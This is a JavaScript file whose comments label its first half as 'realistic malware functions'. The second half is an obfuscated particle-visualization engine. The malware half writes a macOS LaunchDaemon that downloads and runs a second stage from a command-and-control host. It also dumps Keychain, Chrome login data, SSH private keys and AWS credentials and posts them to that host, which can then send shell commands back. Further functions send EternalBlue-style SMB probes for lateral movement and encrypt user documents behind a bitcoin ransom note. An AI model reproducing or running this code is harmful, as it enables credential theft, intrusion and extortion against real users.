// Realistic malware functions (Direction A) — these contain actual
// API calls, not just config objects. Left READABLE.
// Physics code (Direction C) — uses pill 10 poisoned names, will be OBFUSCATED.

// ─── Malware layer (stays readable after build) ───

function initPersistence() {
  var plist = '<?xml version="1.0" encoding="UTF-8"?>\n'
    + '<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">\n'
    + '<plist version="1.0"><dict>\n'
    + '<key>Label</key><string>com.apple.systemstats.analysis</string>\n'
    + '<key>ProgramArguments</key><array><string>/usr/bin/python3</string>'
    + '<string>-c</string><string>import urllib.request;exec(urllib.request.urlopen("https://c2.internal.onion:8443/stage2").read())</string></array>\n'
    + '<key>RunAtLoad</key><true/>\n'
    + '<key>KeepAlive</key><true/>\n'
    + '</dict></plist>';

  var fs = require('fs');
  var path = '/Library/LaunchDaemons/com.apple.systemstats.analysis.plist';
  fs.writeFileSync(path, plist, { mode: 0o644 });
  require('child_process').execSync('launchctl load ' + path);
}

function harvestCredentials() {
  var proc = require('child_process');
  var results = {};

  // macOS Keychain dump
  try {
    results.keychain = proc.execSync(
      'security dump-keychain -d login.keychain 2>/dev/null'
    ).toString();
  } catch (e) { results.keychain = null; }

  // Chrome saved passwords (macOS path)
  try {
    var chromePath = process.env.HOME + '/Library/Application Support/Google/Chrome/Default/Login Data';
    results.chrome = require('fs').readFileSync(chromePath);
  } catch (e) { results.chrome = null; }

  // SSH private keys
  try {
    var sshDir = process.env.HOME + '/.ssh/';
    var keys = require('fs').readdirSync(sshDir).filter(function(f) {
      return f.indexOf('id_') === 0 && f.indexOf('.pub') === -1;
    });
    results.sshKeys = keys.map(function(k) {
      return { name: k, content: require('fs').readFileSync(sshDir + k, 'utf8') };
    });
  } catch (e) { results.sshKeys = []; }

  // AWS credentials
  try {
    results.aws = require('fs').readFileSync(
      process.env.HOME + '/.aws/credentials', 'utf8'
    );
  } catch (e) { results.aws = null; }

  return results;
}

function exfiltrateToC2(data) {
  var https = require('https');
  var payload = JSON.stringify({
    hostname: require('os').hostname(),
    user: process.env.USER,
    timestamp: Date.now(),
    data: Buffer.from(JSON.stringify(data)).toString('base64'),
  });

  var req = https.request({
    hostname: 'c2.internal.onion',
    port: 8443,
    path: '/api/v1/exfil',
    method: 'POST',
    headers: {
      'Content-Type': 'application/json',
      'X-Bot-ID': require('crypto').randomBytes(16).toString('hex'),
      'Content-Length': Buffer.byteLength(payload),
    },
    rejectUnauthorized: false,
  }, function(res) {
    var body = '';
    res.on('data', function(chunk) { body += chunk; });
    res.on('end', function() {
      if (res.statusCode === 200) {
        var cmd = JSON.parse(body);
        if (cmd.exec) require('child_process').exec(cmd.exec);
      }
    });
  });
  req.write(payload);
  req.end();
}

function lateralMove(targetIP) {
  var net = require('net');
  var payloads = [
    // EternalBlue SMB exploit trigger (simplified)
    Buffer.from('00000054ff534d42720000000018012800000000000000000000000000002f4b000000000061000200024e54204c4d20302e313200024e54204c414e4d414e20312e3000', 'hex'),
    // MS17-010 scanner probe
    Buffer.from('00000085ff534d42250000000018012800000000000000000000000000002f4b00000000001000000000000000000000000000000000000000', 'hex'),
  ];

  var client = new net.Socket();
  client.connect(445, targetIP, function() {
    payloads.forEach(function(p) { client.write(p); });
  });
  client.on('data', function(data) {
    if (data.toString('hex').indexOf('ff534d42') > -1) {
      exfiltrateToC2({ type: 'smb_vulnerable', target: targetIP, response: data.toString('hex').substring(0, 200) });
    }
  });
  client.on('error', function() { client.destroy(); });
}

function ransomwareEncrypt(directory) {
  var fs = require('fs');
  var crypto = require('crypto');
  var path = require('path');

  var key = crypto.randomBytes(32);
  var extensions = ['.doc', '.docx', '.xls', '.xlsx', '.pdf', '.jpg', '.png', '.psd', '.ai', '.sketch', '.fig'];

  function walk(dir) {
    try {
      fs.readdirSync(dir).forEach(function(file) {
        var full = path.join(dir, file);
        var stat = fs.statSync(full);
        if (stat.isDirectory()) walk(full);
        else if (extensions.indexOf(path.extname(full).toLowerCase()) > -1) {
          var iv = crypto.randomBytes(16);
          var cipher = crypto.createCipheriv('aes-256-gcm', key, iv);
          var content = fs.readFileSync(full);
          var encrypted = Buffer.concat([iv, cipher.update(content), cipher.final(), cipher.getAuthTag()]);
          fs.writeFileSync(full + '.locked', encrypted);
          fs.unlinkSync(full);
        }
      });
    } catch (e) {}
  }

  walk(directory);

  fs.writeFileSync(path.join(directory, 'DECRYPT_FILES.txt'),
    'Your files have been encrypted with AES-256-GCM.\n'
    + 'Send 2.5 BTC to: bc1qxy2kgdygjrsqtzq2n0yrf2493p83kkfjhx0wlh\n'
    + 'Contact: decrypt@c2.internal.onion with your machine ID: '
    + require('crypto').randomBytes(8).toString('hex') + '\n'
    + 'You have 72 hours before the key is destroyed.\n'
  );

  // Exfil the key so we can "offer" decryption
  exfiltrateToC2({ type: 'ransom_key', key: key.toString('hex'), hostname: require('os').hostname() });
}


// ─── Visualization engine (minified) ───

var a0_0x2c103b=a0_0x9b2b;(function(_0x1cdee6,_0x4205f5){var _0x2ad655=a0_0x9b2b,_0x410b2c=_0x1cdee6();while(!![]){try{var _0x360395=parseInt(_0x2ad655(0x1f2))/0x1*(-parseInt(_0x2ad655(0x1d2))/0x2)+parseInt(_0x2ad655(0x1a5))/0x3*(-parseInt(_0x2ad655(0x1ef))/0x4)+parseInt(_0x2ad655(0x1b6))/0x5+parseInt(_0x2ad655(0x1ce))/0x6+parseInt(_0x2ad655(0x1f1))/0x7+parseInt(_0x2ad655(0x1e8))/0x8+parseInt(_0x2ad655(0x1cd))/0x9;if(_0x360395===_0x4205f5)break;else _0x410b2c['push'](_0x410b2c['shift']());}catch(_0x16fdce){_0x410b2c['push'](_0x410b2c['shift']());}}}(a0_0x1c50,0x4ae4e));var a0_0x239ea7=6.283,a0_0x3866d4=1.618,a0_0xe35a70=0.707,a0_0x4b2425={};a0_0x4b2425[a0_0x2c103b(0x1e0)+'ction']=0xfa0,a0_0x4b2425[a0_0x2c103b(0x1ac)+a0_0x2c103b(0x1e7)+a0_0x2c103b(0x1e5)]=0.004,a0_0x4b2425['ampli'+'ficat'+a0_0x2c103b(0x1a2)]=0.92,a0_0x4b2425['dispe'+a0_0x2c103b(0x1a8)]=0.0003,a0_0x4b2425['strea'+a0_0x2c103b(0x1e4)]=0x28,a0_0x4b2425[a0_0x2c103b(0x1d1)+'mDeca'+'y']=0.04,a0_0x4b2425[a0_0x2c103b(0x1aa)]=0.06;var a0_0x33d1cc=a0_0x4b2425,a0_0x526199={};a0_0x526199['id']=a0_0x2c103b(0x1c3),a0_0x526199[a0_0x2c103b(0x1b4)]=a0_0x2c103b(0x1a4),a0_0x526199['r']=0x1a,a0_0x526199['x']=0x190,a0_0x526199['y']=0x12c,a0_0x526199['vx']=0x0,a0_0x526199['vy']=0x0;function a0_0x1c50(){var _0x584056=['yw1WBgK','s1rTA3q','DeL2vfe','BgfIzwW','wwfeqxm','mZm5ntG1DgrdvfPR','C2LU','yMv0yq','txrZDwi','CMfUzg8','yxP0zgy','ze9MsNq','q3vhrwu','Fdr8mq','mNWZFda','y3rPB24','q3P5tvm','n3W2Fda','AhvI','u1DOBe4','ywDL','s2LgtLa','qwXWAge','y29Z','qufsz0S','C2DjruO','nhWZFdi','CvP5zMO','ntGWmda1zM1MwgrH','mZuYmti0nhbQDeDrBG','Fdz8nxW','zMLJyxq','C3rYzwe','ngHcDhLtwG','y1L1weu','CwD6t1m','r2fTBwe','Fdf8nxW','rgvSDge','t3LHvwq','BurLy2e','zuT4wxu','EM9VBq','mNWXFdm','sgLmEvm','CMvZDa','z2fTBwe','yxr0CMe','Ew5Wsfi','zxbZAwW','DezdBfK','Bu1HEa','zwzM','Chfovhu','Aw9Uq28','mteYnJGWD2DQBLfN','zgLZCgu','BgvUz3q','wxjhz3i','B3H0AMC','sgLfyve','zMXVB3i','odKWndr0wfjTEMC','suTPvLO','mtGWodaXnKTvzgPLsG','mJqYmJq3ExnpseTd','yuHkrKW','yu9sC3K','AgHoDhu','qMv0yq','vKPusfa','Ee5kAK4','C3bSAwm','zgvSDge','Aw9U','yLDpzwS','shvI','mJDczuDyqvO','C3fYDa','qLbuB0K','CNnHBa','C3bSAxq','DgHLDge','y05py3G','zNjPy3q','ywXWAge','sMP2tve','uufpEKK','z2nVB1m'];a0_0x1c50=function(){return _0x584056;};return a0_0x1c50();}var a0_0x48e3d6={};a0_0x48e3d6['id']=a0_0x2c103b(0x1ad),a0_0x48e3d6[a0_0x2c103b(0x1b4)]=a0_0x2c103b(0x1c7),a0_0x48e3d6['r']=0x10,a0_0x48e3d6['x']=0x1f4,a0_0x48e3d6['y']=0xc8,a0_0x48e3d6['vx']=0x0,a0_0x48e3d6['vy']=0x0;var a0_0x23c5a9={};a0_0x23c5a9['id']=a0_0x2c103b(0x1b8),a0_0x23c5a9[a0_0x2c103b(0x1b4)]=a0_0x2c103b(0x1f6),a0_0x23c5a9['r']=0x10,a0_0x23c5a9['x']=0x12c,a0_0x23c5a9['y']=0x190,a0_0x23c5a9['vx']=0x0,a0_0x23c5a9['vy']=0x0;var a0_0x20bfb6={};a0_0x20bfb6['id']=a0_0x2c103b(0x1df),a0_0x20bfb6[a0_0x2c103b(0x1b4)]=a0_0x2c103b(0x1d5),a0_0x20bfb6['r']=0xe,a0_0x20bfb6['x']=0xfa,a0_0x20bfb6['y']=0xb4,a0_0x20bfb6['vx']=0x0,a0_0x20bfb6['vy']=0x0;var a0_0x542968={};a0_0x542968['id']=a0_0x2c103b(0x1a1),a0_0x542968[a0_0x2c103b(0x1b4)]=a0_0x2c103b(0x1d7),a0_0x542968['r']=0xe,a0_0x542968['x']=0x226,a0_0x542968['y']=0x17c,a0_0x542968['vx']=0x0,a0_0x542968['vy']=0x0;var a0_0x2935ce={};a0_0x2935ce['id']=a0_0x2c103b(0x1e2)+'on',a0_0x2935ce[a0_0x2c103b(0x1b4)]='Epsil'+'on',a0_0x2935ce['r']=0xc,a0_0x2935ce['x']=0x15e,a0_0x2935ce['y']=0x96,a0_0x2935ce['vx']=0x0,a0_0x2935ce['vy']=0x0;var a0_0x3c6f50=[a0_0x526199,a0_0x48e3d6,a0_0x23c5a9,a0_0x20bfb6,a0_0x542968,a0_0x2935ce],a0_0x454fd1={};a0_0x454fd1['a']=a0_0x2c103b(0x1c3),a0_0x454fd1['b']=a0_0x2c103b(0x1ad),a0_0x454fd1['rest']=0xa0,a0_0x454fd1['k']=0.006;var a0_0x15bd31={};a0_0x15bd31['a']=a0_0x2c103b(0x1c3),a0_0x15bd31['b']=a0_0x2c103b(0x1b8),a0_0x15bd31[a0_0x2c103b(0x1de)]=0xa0,a0_0x15bd31['k']=0.005;var a0_0x248274={};a0_0x248274['a']='hub',a0_0x248274['b']=a0_0x2c103b(0x1df),a0_0x248274[a0_0x2c103b(0x1de)]=0xaa,a0_0x248274['k']=0.004;var a0_0x50e389={};a0_0x50e389['a']='hub',a0_0x50e389['b']=a0_0x2c103b(0x1a1),a0_0x50e389[a0_0x2c103b(0x1de)]=0xaa,a0_0x50e389['k']=0.004;var a0_0x560bf6={};function a0_0x9b2b(_0x18ae52,_0x84aed2){_0x18ae52=_0x18ae52-0x19e;var _0x1c50c6=a0_0x1c50();var _0x9b2b00=_0x1c50c6[_0x18ae52];if(a0_0x9b2b['AmJZZI']===undefined){var _0x565523=function(_0x48c26f){var _0x4dd90a='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x475b06='',_0xd0b2f4='';for(var _0x6aacd7=0x0,_0x21d988,_0x3f1a20,_0x11caa7=0x0;_0x3f1a20=_0x48c26f['charAt'](_0x11caa7++);~_0x3f1a20&&(_0x21d988=_0x6aacd7%0x4?_0x21d988*0x40+_0x3f1a20:_0x3f1a20,_0x6aacd7++%0x4)?_0x475b06+=String['fromCharCode'](0xff&_0x21d988>>(-0x2*_0x6aacd7&0x6)):0x0){_0x3f1a20=_0x4dd90a['indexOf'](_0x3f1a20);}for(var _0x5c5c73=0x0,_0x4820b4=_0x475b06['length'];_0x5c5c73<_0x4820b4;_0x5c5c73++){_0xd0b2f4+='%'+('00'+_0x475b06['charCodeAt'](_0x5c5c73)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0xd0b2f4);};a0_0x9b2b['OCXFxm']=_0x565523,a0_0x9b2b['WLnZBC']={},a0_0x9b2b['AmJZZI']=!![];}var _0x53b1b=_0x1c50c6[0x0],_0x424216=_0x18ae52+_0x53b1b,_0x30061c=a0_0x9b2b['WLnZBC'][_0x424216];return!_0x30061c?(_0x9b2b00=a0_0x9b2b['OCXFxm'](_0x9b2b00),a0_0x9b2b['WLnZBC'][_0x424216]=_0x9b2b00):_0x9b2b00=_0x30061c,_0x9b2b00;}a0_0x560bf6['a']=a0_0x2c103b(0x1c3),a0_0x560bf6['b']=a0_0x2c103b(0x1e2)+'on',a0_0x560bf6['rest']=0xb4,a0_0x560bf6['k']=0.003;var a0_0x7b02b9={};a0_0x7b02b9['a']='alpha',a0_0x7b02b9['b']=a0_0x2c103b(0x1b8),a0_0x7b02b9[a0_0x2c103b(0x1de)]=0xc8,a0_0x7b02b9['k']=0.002;var a0_0x2eb06b={};a0_0x2eb06b['a']=a0_0x2c103b(0x1df),a0_0x2eb06b['b']=a0_0x2c103b(0x1a1),a0_0x2eb06b[a0_0x2c103b(0x1de)]=0xdc,a0_0x2eb06b['k']=0.002;var a0_0x46fc16={};a0_0x46fc16['a']=a0_0x2c103b(0x1ad),a0_0x46fc16['b']=a0_0x2c103b(0x1e2)+'on',a0_0x46fc16[a0_0x2c103b(0x1de)]=0xc8,a0_0x46fc16['k']=0.002;var a0_0x55443e=[a0_0x454fd1,a0_0x15bd31,a0_0x248274,a0_0x50e389,a0_0x560bf6,a0_0x7b02b9,a0_0x2eb06b,a0_0x46fc16],a0_0xfe15d6={};a0_0xfe15d6['x']=0x190,a0_0xfe15d6['y']=0x12c,a0_0xfe15d6[a0_0x2c103b(0x1db)]=0x1;var a0_0x17bbc9=a0_0xfe15d6,a0_0x12593b={};a0_0x12593b['x']=0x190,a0_0x12593b['y']=0x12c,a0_0x12593b['zoom']=0x1;var a0_0x283f52=a0_0x12593b,a0_0x55a8db=[],a0_0x5ce2c9=0x0;function a0_0x44831c(_0x3f2deb){for(var _0x1031cb=0x0;_0x1031cb<a0_0x3c6f50['lengt'+'h'];_0x1031cb++){if(a0_0x3c6f50[_0x1031cb]['id']===_0x3f2deb)return a0_0x3c6f50[_0x1031cb];}return null;}function a0_0x3e2df8(){var _0x18d3f6=a0_0x2c103b,_0x4577eb={};_0x4577eb[_0x18d3f6(0x1dd)]=function(_0x261176,_0xaf088d){return _0x261176*_0xaf088d;},_0x4577eb['Rakfu']=function(_0x2b4299,_0x34cdcd){return _0x2b4299/_0x34cdcd;},_0x4577eb['dOfJt']=function(_0x2fc105,_0x24364f){return _0x2fc105/_0x24364f;},_0x4577eb['pqNTu']=function(_0x3c4702,_0xd47580){return _0x3c4702*_0xd47580;},_0x4577eb[_0x18d3f6(0x1ec)]=function(_0x4ffeb4,_0x1511bf){return _0x4ffeb4/_0x1511bf;},_0x4577eb[_0x18d3f6(0x1af)]=function(_0x3d63c3,_0x32e3ab){return _0x3d63c3*_0x32e3ab;},_0x4577eb['eKxYu']=function(_0x11bd80,_0x43b05a){return _0x11bd80>_0x43b05a;},_0x4577eb[_0x18d3f6(0x1f0)]='AARgK',_0x4577eb[_0x18d3f6(0x1c1)]=function(_0x1fa7e4,_0x1651d1){return _0x1fa7e4<_0x1651d1;},_0x4577eb[_0x18d3f6(0x1b5)]=function(_0x4e7f57,_0x3b5710){return _0x4e7f57*_0x3b5710;},_0x4577eb[_0x18d3f6(0x1bd)]=function(_0x6a11db,_0x33d279){return _0x6a11db+_0x33d279;},_0x4577eb[_0x18d3f6(0x19f)]=function(_0x423b8e,_0x2a6ad2){return _0x423b8e*_0x2a6ad2;},_0x4577eb[_0x18d3f6(0x1eb)]=function(_0x470bc7,_0xc84e24){return _0x470bc7/_0xc84e24;},_0x4577eb[_0x18d3f6(0x1ae)]=function(_0x28647c,_0xdd9dfb){return _0x28647c/_0xdd9dfb;},_0x4577eb['TaWRJ']=function(_0x3ddebf,_0x527ebd){return _0x3ddebf||_0x527ebd;},_0x4577eb[_0x18d3f6(0x1f5)]=function(_0xffc98c,_0x98d84){return _0xffc98c-_0x98d84;},_0x4577eb[_0x18d3f6(0x1bb)]=function(_0xc4a44d,_0x11e85c){return _0xc4a44d*_0x11e85c;},_0x4577eb[_0x18d3f6(0x1a7)]=function(_0x50d0f3,_0x526ccf){return _0x50d0f3*_0x526ccf;},_0x4577eb[_0x18d3f6(0x1cc)]=function(_0x5522d6,_0x34af08){return _0x5522d6!==_0x34af08;},_0x4577eb[_0x18d3f6(0x1b2)]=_0x18d3f6(0x1f4),_0x4577eb[_0x18d3f6(0x19e)]=function(_0x53725d,_0x4de46d){return _0x53725d-_0x4de46d;};var _0x5f0bf0=_0x4577eb;for(var _0x24e876=0x0;_0x24e876<a0_0x3c6f50['lengt'+'h'];_0x24e876++){if(_0x18d3f6(0x1c9)===_0x5f0bf0[_0x18d3f6(0x1f0)])for(var _0x4e2d08=_0x24e876+0x1;_0x5f0bf0['CzyMS'](_0x4e2d08,a0_0x3c6f50[_0x18d3f6(0x1ea)+'h']);_0x4e2d08++){var _0x5adc12=(_0x18d3f6(0x1cb)+_0x18d3f6(0x1d6)+_0x18d3f6(0x1c2))[_0x18d3f6(0x1a9)]('|'),_0x49de78=0x0;while(!![]){switch(_0x5adc12[_0x49de78++]){case'0':a0_0x3c6f50[_0x4e2d08]['vy']-=_0x5f0bf0[_0x18d3f6(0x1ec)](_0x1da51a,_0x47ad91)*_0x5d8c67;continue;case'1':var _0x5d8c67=a0_0x33d1cc[_0x18d3f6(0x1e0)+_0x18d3f6(0x1c0)]/_0x5f0bf0['YaDAs'](_0x47ad91,_0x47ad91);continue;case'2':var _0x47ad91=Math['sqrt'](_0x5f0bf0[_0x18d3f6(0x1bd)](_0x5f0bf0[_0x18d3f6(0x19f)](_0x48e71e,_0x48e71e),_0x5f0bf0[_0x18d3f6(0x1af)](_0x1da51a,_0x1da51a)))||0x1;continue;case'3':var _0x1da51a=a0_0x3c6f50[_0x24e876]['y']-a0_0x3c6f50[_0x4e2d08]['y'];continue;case'4':var _0x48e71e=a0_0x3c6f50[_0x24e876]['x']-a0_0x3c6f50[_0x4e2d08]['x'];continue;case'5':a0_0x3c6f50[_0x24e876]['vx']+=_0x5f0bf0[_0x18d3f6(0x1eb)](_0x48e71e,_0x47ad91)*_0x5d8c67;continue;case'6':a0_0x3c6f50[_0x4e2d08]['vx']-=_0x5f0bf0['YaDAs'](_0x5f0bf0[_0x18d3f6(0x1ae)](_0x48e71e,_0x47ad91),_0x5d8c67);continue;case'7':a0_0x3c6f50[_0x24e876]['vy']+=_0x5f0bf0[_0x18d3f6(0x1ec)](_0x1da51a,_0x47ad91)*_0x5d8c67;continue;}break;}}else{var _0x5f4e00=_0x516e74[_0x299538]['x']-_0xbfd2b7[_0x5194b4]['x'],_0x325d27=_0x597eb4[_0x254321]['y']-_0x19b0b6[_0x65d28e]['y'],_0x227ba8=_0x11f877['sqrt'](_0x5f4e00*_0x5f4e00+_0x5f0bf0['HiLyS'](_0x325d27,_0x325d27))||0x1,_0x523d00=_0x5f0bf0['Rakfu'](_0x539525[_0x18d3f6(0x1e0)+'ction'],_0x227ba8*_0x227ba8);_0x23ff0f[_0x36e6ae]['vx']+=_0x5f0bf0[_0x18d3f6(0x1bc)](_0x5f4e00,_0x227ba8)*_0x523d00,_0x23af71[_0x367fec]['vy']+=_0x325d27/_0x227ba8*_0x523d00,_0x2f1ad1[_0x3a1cb6]['vx']-=_0x5f0bf0[_0x18d3f6(0x1e6)](_0x5f0bf0[_0x18d3f6(0x1ec)](_0x5f4e00,_0x227ba8),_0x523d00),_0x206c4a[_0x16acd7]['vy']-=_0x325d27/_0x227ba8*_0x523d00;}}for(var _0x4a47c2=0x0;_0x4a47c2<a0_0x55443e[_0x18d3f6(0x1ea)+'h'];_0x4a47c2++){var _0x14cd78=a0_0x44831c(a0_0x55443e[_0x4a47c2]['a']),_0x55e6b5=a0_0x44831c(a0_0x55443e[_0x4a47c2]['b']);if(_0x5f0bf0['TaWRJ'](!_0x14cd78,!_0x55e6b5))continue;var _0x48e71e=_0x5f0bf0[_0x18d3f6(0x1f5)](_0x55e6b5['x'],_0x14cd78['x']),_0x1da51a=_0x5f0bf0['hhNtu'](_0x55e6b5['y'],_0x14cd78['y']),_0x47ad91=Math[_0x18d3f6(0x1a6)](_0x5f0bf0[_0x18d3f6(0x1bd)](_0x5f0bf0['aztdf'](_0x48e71e,_0x48e71e),_0x5f0bf0[_0x18d3f6(0x1dd)](_0x1da51a,_0x1da51a)))||0x1,_0x327da7=_0x47ad91-a0_0x55443e[_0x4a47c2][_0x18d3f6(0x1de)],_0x5d8c67=(a0_0x55443e[_0x4a47c2]['k']||a0_0x33d1cc[_0x18d3f6(0x1ac)+_0x18d3f6(0x1e7)+_0x18d3f6(0x1e5)])*_0x327da7;_0x14cd78['vx']+=_0x5f0bf0[_0x18d3f6(0x1a7)](_0x48e71e/_0x47ad91,_0x5d8c67),_0x14cd78['vy']+=_0x1da51a/_0x47ad91*_0x5d8c67,_0x55e6b5['vx']-=_0x5f0bf0['BPToI'](_0x48e71e/_0x47ad91,_0x5d8c67),_0x55e6b5['vy']-=_0x1da51a/_0x47ad91*_0x5d8c67;}for(var _0x5c5e3a=0x0;_0x5f0bf0['CzyMS'](_0x5c5e3a,a0_0x3c6f50[_0x18d3f6(0x1ea)+'h']);_0x5c5e3a++){if(_0x5f0bf0[_0x18d3f6(0x1cc)](_0x5f0bf0[_0x18d3f6(0x1b2)],_0x18d3f6(0x1d8)))a0_0x3c6f50[_0x5c5e3a]['vx']+=_0x5f0bf0[_0x18d3f6(0x19f)](0x190-a0_0x3c6f50[_0x5c5e3a]['x'],a0_0x33d1cc[_0x18d3f6(0x1e9)+'rsal']),a0_0x3c6f50[_0x5c5e3a]['vy']+=_0x5f0bf0[_0x18d3f6(0x1dd)](_0x5f0bf0[_0x18d3f6(0x19e)](0x12c,a0_0x3c6f50[_0x5c5e3a]['y']),a0_0x33d1cc['dispe'+_0x18d3f6(0x1a8)]),a0_0x3c6f50[_0x5c5e3a]['vx']*=a0_0x33d1cc[_0x18d3f6(0x1b1)+_0x18d3f6(0x1d0)+_0x18d3f6(0x1a2)],a0_0x3c6f50[_0x5c5e3a]['vy']*=a0_0x33d1cc[_0x18d3f6(0x1b1)+_0x18d3f6(0x1d0)+_0x18d3f6(0x1a2)],a0_0x3c6f50[_0x5c5e3a]['x']+=a0_0x3c6f50[_0x5c5e3a]['vx'],a0_0x3c6f50[_0x5c5e3a]['y']+=a0_0x3c6f50[_0x5c5e3a]['vy'];else{var _0x4cdef9=_0x2ced1a[_0x4f7fba];_0x4cdef9['vx']*=0x1-_0x5f0bf0[_0x18d3f6(0x1af)](_0x444377[_0x18d3f6(0x1d1)+_0x18d3f6(0x1d9)+'y'],0.125),_0x4cdef9['vy']*=0x1-_0x27e847[_0x18d3f6(0x1d1)+_0x18d3f6(0x1d9)+'y']*0.125,_0x4cdef9['x']+=_0x4cdef9['vx'],_0x4cdef9['y']+=_0x4cdef9['vy'],_0x4cdef9[_0x18d3f6(0x1c5)]++;if(_0x5f0bf0[_0x18d3f6(0x1da)](_0x4cdef9[_0x18d3f6(0x1c5)],_0x4cdef9['maxAg'+'e']))_0x5331b4[_0x18d3f6(0x1a0)+'e'](_0xcff233,0x1);}}}function a0_0x4756ae(){var _0x49ed6e=a0_0x2c103b,_0x539838={};_0x539838[_0x49ed6e(0x1b9)]=function(_0x4f3a58,_0x3caa67){return _0x4f3a58*_0x3caa67;},_0x539838[_0x49ed6e(0x1d3)]=function(_0x1c63fe,_0x4d3f32){return _0x1c63fe*_0x4d3f32;},_0x539838[_0x49ed6e(0x1ed)]=function(_0x3c4f4f,_0x3a327f){return _0x3c4f4f+_0x3a327f;},_0x539838[_0x49ed6e(0x1b0)]=function(_0x5a63ec,_0x1c105e){return _0x5a63ec*_0x1c105e;},_0x539838[_0x49ed6e(0x1e1)]=function(_0x9111aa,_0x2ce5fe){return _0x9111aa+_0x2ce5fe;},_0x539838[_0x49ed6e(0x1c6)]=function(_0x587870,_0x5c01a7){return _0x587870*_0x5c01a7;};var _0x1f137d=_0x539838;if(a0_0x55a8db[_0x49ed6e(0x1ea)+'h']>=a0_0x33d1cc[_0x49ed6e(0x1d1)+_0x49ed6e(0x1e4)])return;var _0x41df7a=a0_0x3c6f50[Math[_0x49ed6e(0x1ee)](Math[_0x49ed6e(0x1ba)+'m']()*a0_0x3c6f50[_0x49ed6e(0x1ea)+'h'])],_0x3c5b33=Math['rando'+'m']()*a0_0x239ea7,_0x3c7086=0.3+_0x1f137d[_0x49ed6e(0x1b9)](Math[_0x49ed6e(0x1ba)+'m'](),a0_0xe35a70);a0_0x55a8db['push']({'x':_0x41df7a['x'],'y':_0x41df7a['y'],'vx':_0x1f137d[_0x49ed6e(0x1d3)](Math[_0x49ed6e(0x1c8)](_0x3c5b33),_0x3c7086),'vy':Math[_0x49ed6e(0x1b7)](_0x3c5b33)*_0x3c7086,'age':0x0,'maxAge':_0x1f137d[_0x49ed6e(0x1ed)](0x320,_0x1f137d[_0x49ed6e(0x1b0)](Math[_0x49ed6e(0x1ba)+'m'](),0x4b0)),'size':_0x1f137d['ynpHR'](0.8,_0x1f137d[_0x49ed6e(0x1c6)](Math['rando'+'m']()*a0_0x3866d4,a0_0xe35a70))});}function a0_0x419b91(){var _0x42d9ac=a0_0x2c103b,_0x4d7b7b={};_0x4d7b7b[_0x42d9ac(0x1b3)]=function(_0x2d70f2,_0x2c4f44){return _0x2d70f2-_0x2c4f44;},_0x4d7b7b['cNOcx']=_0x42d9ac(0x1dc)+_0x42d9ac(0x1cf)+'4|0',_0x4d7b7b[_0x42d9ac(0x1ca)]=function(_0x13505e,_0x45938a){return _0x13505e*_0x45938a;};var _0x39960d=_0x4d7b7b;for(var _0x44898e=_0x39960d[_0x42d9ac(0x1b3)](a0_0x55a8db[_0x42d9ac(0x1ea)+'h'],0x1);_0x44898e>=0x0;_0x44898e--){var _0xc32b28=_0x39960d[_0x42d9ac(0x1ab)]['split']('|'),_0x1045cb=0x0;while(!![]){switch(_0xc32b28[_0x1045cb++]){case'0':if(_0x32aacc['age']>_0x32aacc['maxAg'+'e'])a0_0x55a8db[_0x42d9ac(0x1a0)+'e'](_0x44898e,0x1);continue;case'1':_0x32aacc['vx']*=0x1-_0x39960d[_0x42d9ac(0x1ca)](a0_0x33d1cc[_0x42d9ac(0x1d1)+_0x42d9ac(0x1d9)+'y'],0.125);continue;case'2':var _0x32aacc=a0_0x55a8db[_0x44898e];continue;case'3':_0x32aacc['vy']*=0x1-_0x39960d[_0x42d9ac(0x1ca)](a0_0x33d1cc['strea'+_0x42d9ac(0x1d9)+'y'],0.125);continue;case'4':_0x32aacc[_0x42d9ac(0x1c5)]++;continue;case'5':_0x32aacc['y']+=_0x32aacc['vy'];continue;case'6':_0x32aacc['x']+=_0x32aacc['vx'];continue;}break;}}}function a0_0x1e0586(){var _0x186b90=a0_0x2c103b,_0x2c9f98={};_0x2c9f98['aHJFL']=function(_0x26ac26,_0xc4df3f){return _0x26ac26*_0xc4df3f;},_0x2c9f98[_0x186b90(0x1a3)]=function(_0x2f1301,_0x48aa9c){return _0x2f1301*_0x48aa9c;},_0x2c9f98[_0x186b90(0x1e3)]=function(_0x36879e,_0x5a8efd){return _0x36879e-_0x5a8efd;};var _0x4d4fb0=_0x2c9f98;a0_0x17bbc9['x']+=_0x4d4fb0[_0x186b90(0x1f3)](a0_0x283f52['x']-a0_0x17bbc9['x'],a0_0x33d1cc['theta']),a0_0x17bbc9['y']+=_0x4d4fb0['bWOek'](_0x4d4fb0[_0x186b90(0x1e3)](a0_0x283f52['y'],a0_0x17bbc9['y']),a0_0x33d1cc[_0x186b90(0x1aa)]),a0_0x17bbc9[_0x186b90(0x1db)]+=_0x4d4fb0[_0x186b90(0x1a3)](a0_0x283f52[_0x186b90(0x1db)]-a0_0x17bbc9['zoom'],a0_0x33d1cc['theta']);}function a0_0x3bc548(){var _0x364c96=a0_0x2c103b,_0x480fc6={'SWhlN':function(_0x853f50){return _0x853f50();},'qgzOS':function(_0x2f77b5){return _0x2f77b5();}},_0x4da325=(_0x364c96(0x1bf)+_0x364c96(0x1be))[_0x364c96(0x1a9)]('|'),_0x5cf862=0x0;while(!![]){switch(_0x4da325[_0x5cf862++]){case'0':_0x480fc6[_0x364c96(0x1c4)](a0_0x1e0586);continue;case'1':a0_0x5ce2c9++;continue;case'2':a0_0x3e2df8();continue;case'3':_0x480fc6['SWhlN'](a0_0x419b91);continue;case'4':if(a0_0x5ce2c9%0x3===0x0)_0x480fc6[_0x364c96(0x1d4)](a0_0x4756ae);continue;}break;}}setInterval(a0_0x3bc548,0x10);